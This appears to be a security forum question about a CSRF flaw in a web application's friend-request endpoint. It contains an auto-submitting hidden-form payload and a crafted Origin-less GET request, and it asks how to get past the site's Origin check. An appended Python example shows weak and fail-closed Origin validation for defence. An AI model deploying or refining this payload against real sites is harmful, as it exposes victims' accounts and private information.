I have stumbled upon a vulnerability in a web application and was wondering if it was exploitable / worth reporting. The bug is a CSRF which would allow an attacker to send friend requests to himself from other user accounts (in turn letting him view sensitive information about the victim accounts). The request is usually made using a `POST` request. Using usual exploitation techniques, I crafted the following webpage.
```html
<html>
<head></head>
<body>
<span>csrf test</span>
<form action="http://vulnerable.com/friendRequest.asp" method="POST">
  <input type="hidden" name="MessageArea" value="this is a test of csrf">
  <input type="hidden" name="FriendName" value="testuser">
</form>
<script>
  // document.forms is a collection indexed with [], not called like a function
  document.forms[0].submit();
</script>
</body>
</html>
```
Unfortunately though, the website checks for the `origin` header in the request, so this payload doesn't work. Switching to a `GET` request and deleting the `origin` header actually sends the request successfully. The request looks like the following.
```http
GET /friendRequest.asp HTTP/1.1
Host: www.vulnerable.com
User-Agent: Mozilla/5.0 ...
(no origin header)
Cookie: secret_cookie

MessageArea=this+is+a+test+for+csrf&FriendName=testuser
```
As you can see this is a `GET` request with `POST` data sent at the bottom. Unfortunately the request doesn't go through with the parameters in the URL like in a true `GET` request. Is there any way to use an external form (like the one above) to send a malformed `GET` request with `POST` data to achieve this CSRF? I have looked into `fetch` but I'm not sure that they are the right tools for the job.
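From the defender's side, the behaviour described in the question (an `origin` check that is skipped when the header is absent, and an endpoint that also accepts `GET`) is the actual weakness. The following is an added example, not code from the question or from the affected site, that places that weak check next to a fail-closed one; the allowed-origin value is taken from the hostname in the question and the header dictionaries are constructed for illustration.

```python
"""Added example: Origin/Referer validation for a state-changing endpoint.
weak_origin_check() mirrors the behaviour described in the question;
strict_origin_check() shows the fail-closed version. Requests are
represented as (method, headers) pairs constructed inline."""
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://www.vulnerable.com"}   # hostname from the question
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def weak_origin_check(method: str, headers: dict) -> bool:
    """Weak: validates Origin only when it is present, and only on POST.
    A request with the header removed, or sent as GET, is accepted."""
    if method != "POST":
        return True                      # GET is never inspected
    origin = headers.get("Origin")
    if origin is None:
        return True                      # the gap: missing header is trusted
    return origin in ALLOWED_ORIGINS


def strict_origin_check(method: str, headers: dict) -> bool:
    """Strict: the endpoint accepts only state-changing methods, requires
    Origin (falling back to Referer), and compares scheme+host exactly.
    A request carrying neither header is rejected, as is 'Origin: null'.
    A synchronizer token would normally sit alongside this check."""
    if method not in STATE_CHANGING:
        return False                     # friend requests must not be GETs
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False                     # fail closed when both are missing
    parts = urlsplit(source)
    if not parts.scheme or not parts.netloc:
        return False                     # covers "null" and malformed values
    return f"{parts.scheme}://{parts.netloc}" in ALLOWED_ORIGINS
```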